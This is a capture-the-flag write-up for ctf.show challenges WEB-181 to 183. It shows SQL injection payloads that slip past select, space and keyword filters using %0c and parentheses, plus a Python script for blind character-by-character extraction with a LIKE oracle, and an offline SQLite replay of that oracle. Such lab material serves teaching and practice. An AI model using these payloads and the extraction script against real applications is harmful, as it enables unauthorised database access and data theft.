WEB-181--WEB-183

WEB-181

select is filtered, so the injection has to work without it. Spaces are also blocked; the form feed %0c is accepted by MySQL as whitespace and gets past the filter:

-1'%0cor%0cusername%0clike%0c'flag

WEB-182

Both flag and %0c are filtered now, which is annoying, but parentheses work as token separators so no whitespace is needed at all. Then it's a matter of trying ids one by one; the flag row turned out to be id=26.

-1'or(id)like'26

WEB-183

Everything that could be filtered is filtered, so the only option left is blind injection. The tableName parameter lands in the FROM clause, and the page reports how many rows came back ($user_count), which gives a yes/no oracle: guess the flag one character at a time with LIKE and a trailing % wildcard.

import requests, re

# Alphabet for the flag body. Note that _ is itself a LIKE wildcard (it matches
# any single character), so a hit on _ may really mean "a character outside this alphabet".
dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://77b9fcdf-0b47-4895-91e5-500a9094f5b9.challenge.ctf.show/select-waf.php"
res = []
# Injected into the FROM clause: ... from (ctfshow_user)where(pass)like('ctfshow{<prefix>%}')
# % matches any suffix, so the query returns the flag row exactly when the prefix is right.
post_tem = "(ctfshow_user)where(pass)like('ctfshow{{{}%}}')"
# headers = {
#     "Content-Type": "application/x-www-form-urlencoded"
# }

for a in range(1, 50):
    temp = len(res)
    for i in dic:
        res.append(i)
        post = {"tableName": post_tem.format("".join(res))}
        print(post)
        r = requests.post(url=url, data=post)
        print(r.text[2533:2555])  # slice of the page around "$user_count = ..." for debugging
        if re.findall(r"\$user_count = 1", r.text):  # prefix correct: keep this character
            break
        res.pop(-1)  # wrong guess: drop it and try the next character

    if temp == len(res):  # no character extends the prefix: the flag is complete
        break

print("ctfshow{" + "".join(res) + "}")

Note: the post data must be passed as a dict. If you pass a string, requests sends it as a raw body with no Content-Type header, PHP never parses it into $_POST, and the parameter silently has no effect.

Key point: the percent sign % is the wildcard in a MySQL LIKE pattern; it matches any sequence of characters, including an empty one, which is what turns LIKE into a prefix-match oracle.
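The prefix-match oracle the script above relies on, replayed offline against a local SQLite table, as an added example that is not part of the original writeup. The table name ctfshow_user and the column pass are taken from the payload above; the flag values, the guest row and the function names are constructed for the example. It also adds the check the script skips: _ is a LIKE wildcard too, so an unescaped alphabet can silently record _ for a character it cannot name, and a final exact-match query (no trailing %) catches that. Whether the challenge's WAF would let the backslash escape through is not something the page tested; it is assumed here.

```python
import sqlite3

# Flag alphabet from the page's script. Both _ and % are LIKE metacharacters.
ALPHABET = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"


def build_payload(body):
    """The exact tableName value the page's script sends for a guessed prefix."""
    return f"(ctfshow_user)where(pass)like('ctfshow{{{body}%}}')"


def like_escape(s):
    """Escape LIKE metacharacters; the escape character is backslash, as in MySQL."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_db(flag):
    """Constructed stand-in for the target: in-memory SQLite with one flag row
    and one unrelated row, mirroring the table/column names in the payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ctfshow_user(username text, pass text)")
    conn.executemany(
        "insert into ctfshow_user values (?, ?)",
        [("admin", flag), ("guest", "not-a-flag")],
    )
    return conn


def oracle(conn, pattern):
    """Stand-in for the "$user_count = 1" check: true when exactly one row's
    pass column matches the LIKE pattern. MySQL uses backslash as the LIKE
    escape character by default; SQLite needs the explicit ESCAPE clause."""
    (count,) = conn.execute(
        "select count(*) from ctfshow_user where pass like ? escape '\\'",
        (pattern,),
    ).fetchone()
    return count == 1


def extract(conn, alphabet=ALPHABET, escape_wildcards=True, max_len=50):
    """Recover the flag body one character at a time with the prefix oracle.
    Returns (flag, complete): complete is a final exact-match query with no
    trailing %, which fails when the alphabet missed a character."""
    found = []
    for _ in range(max_len):
        for ch in alphabet:
            guess = "".join(found) + ch
            body = like_escape(guess) if escape_wildcards else guess
            if oracle(conn, f"ctfshow{{{body}%}}"):
                found.append(ch)
                break
        else:
            break  # nothing in the alphabet extends the prefix: stop
    flag = "ctfshow{" + "".join(found) + "}"
    complete = oracle(conn, like_escape(flag))
    return flag, complete


if __name__ == "__main__":
    # Constructed sample flags: the second contains '.', which is not in ALPHABET.
    for sample in ("ctfshow{a1b2-c3d4_e5}", "ctfshow{x.y}"):
        db = build_db(sample)
        print(sample, "escaped:", extract(db), "raw:", extract(db, escape_wildcards=False))
```

With the unescaped alphabet the second sample comes back as ctfshow{x_y} and looks plausible; only the exact-match check reveals that the _ stood in for an unknown character. Escaping the guess instead makes the loop stop at ctfshow{x}, and the same check flags it as incomplete, which is the cue to widen the alphabet rather than trust the output.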